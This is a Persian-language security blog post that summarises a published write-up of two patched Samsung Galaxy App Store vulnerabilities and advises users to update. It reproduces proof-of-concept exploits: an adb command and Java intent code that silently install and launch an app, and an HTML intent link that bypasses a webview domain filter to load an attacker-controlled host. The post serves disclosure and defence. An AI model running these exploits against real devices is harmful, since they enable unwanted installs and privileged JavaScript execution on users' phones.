محققای NCCGROUP بین 23 نوامبر و 3 دسامبر دو آسیب پذیری به شناسه CVE-2023-21433 و CVE-2023-21434 در برنامه Galaxy App Store کشف و گزارش دادن، که امکان نصب برنامه و اجرای کد جاوااسکریپت رو فراهم میکنن.
سامسونگ با ارائه نسخه 4.5.49.8 در اول ژانویه 2023 این دو آسیب پذیری رو اصلاح کرده.
حالا NCCGROUP یه رایتآپ از این آسیب پذیری ها بهمراه PoC منتشر کرده که بخش هایی از اون رو اینجا مرور میکنیم.
برنامه Galaxy App Store ، فروشگاه رسمی برنامه ها برای محصولات سامسونگ هستش و جایگزین Google App Store هستش ، که روی محصولات اندرویدی این شرکت نصب میشه.
آسیب پذیری CVE-2023-21433 :
آسیب پذیری امکان نصب برنامه بدون اجازه کاربر از Galaxy App Store رو فراهم میکنه. مهاجم میتونه با ترغیب کاربر برای نصب یه برنامه مخرب ، از این آسیب پذیری سوء استفاده کنه.
مهاجم میتونه با نصب برنامه ها بدون اجازه ، میزان نصب اونها رو افزایش بده ،با دید تبلیغاتی یا معتبر کردن برنامه های مخرب.
نسخه های تحت تاثیر :
نسخه 4.5.44.1 Galaxy App Store تحت تاثیر این آسیب پذیری هستش. البته عنوان شده که ممکنه نسخه های دیگه هم تحت تاثیر باشن.
نکته : به دلیل یسری ویژگی در نسخه 13 اندروید ، آسیب پذیری فقط روی گوشی هایی که اندروید 12 و پایینتر رو دارن، تاثیر میزاره.
POC :
با استفاده از دستور adb ، برنامه Pokemon Go رو روی گوشی نصب میکنه:
1 |
am start -n com.sec.android.app.samsungapps/.detail.alleypopup.AlleyDetailActivity --es GUID com.nianticlabs.pokemongo.ares --ez directInstall true --ez directOpen tru |
کدهای جاوا زیر هم همین کار انجام میدن :
1 2 3 4 5 6 |
Intent intent = new Intent(); intent.setComponent(new ComponentName("com.sec.android.app.samsungapps", "com.sec.android.app.samsungapps.detail.alleypopup.AlleyDetailActivity")); intent.putExtra("GUID", "com.nianticlabs.pokemongo.ares"); intent.putExtra("directInstall", true); intent.putExtra("directOpen", true); startActivity(intent); |
این PoC این قبلیت رو هم به مهاجم میده که بعد از نصب برنامه ، اونو اجرا کنه یا نه.
توصیه ها:
توصیه شده اگه از نسخه های اندروید 12 و پایینتر استفاده میکنید حتما نسخه جدید Galaxy App Store رو نصب کنید. همچنین توصیه شده اگرچه نسخه های 13 اندروید تحت تاثیر این آسیب پذیری نیستن برای پیامدهای بعدی ،بازم نسخه جدید رو نصب کنن.
آسیب پذیری CVE-2023-21434 :
مولفه webview در Galaxy App Store دارای یه فیلتری هستش که دامنه هایی که میشه در webview دید رو محدود میکنه. به دلیل پیکربندی اشتباه این فیلترها ، امکان دور زدنشون وجود داره.
مهاجم میتونه با ارسال لینک مخرب و ترغیب کاربر برای باز کردن در کروم یا نصب برنامه مخرب ، از این آسیب پذیری سوء استفاده کنه و یه صفحه با کدهای جاوااسکریپت مخرب با امتیاز system رو ، روی هدف اجرا کنه. مثلا لوکیشن گوشی رو تشخیص بده.
نسخه تحت تاثیر :
آسیب پذیری در نسخه 4.5.48.3 این برنامه هستش اما ممکنه نسخه های دیگه رو هم تحت تاثیر بزاره.
PoC :
در PoC زیر بخش host باید با دامنه ای که تحت کنترل مهاجم هست جایگزین بشه. این دامنه باید HTTPS هم داشته باشه. همچنین باید player.glb.samsung-gamelauncher.com رو هم داشته باشه. برای مثال دامنه زیر یک دامنه معتبر هستش:
1 |
player.glb.samsung-gamelauncher.com.nccgroup.com |
1 |
<h1> <a id="yayidyay" rel="noreferrer" href="intent://cloudgame/monitor?monitoringHost=<host>#Intent;action=android.intent.action.VIEW;package=com.sec.android.app.samsungapps;scheme=normalbetasamsungapps;S.android%2eintent%2eextra%2eREFERRER_NAME=http://com.sec.android.app.samsungapps;end"> YAYPOCYAY</a> </h1> |
توصیه ها:
توصیه شده برای جلوگیری از اکسپلویت این آسیب پذیری ، نسخه Galaxy App Store گوشی رو بروز کنید.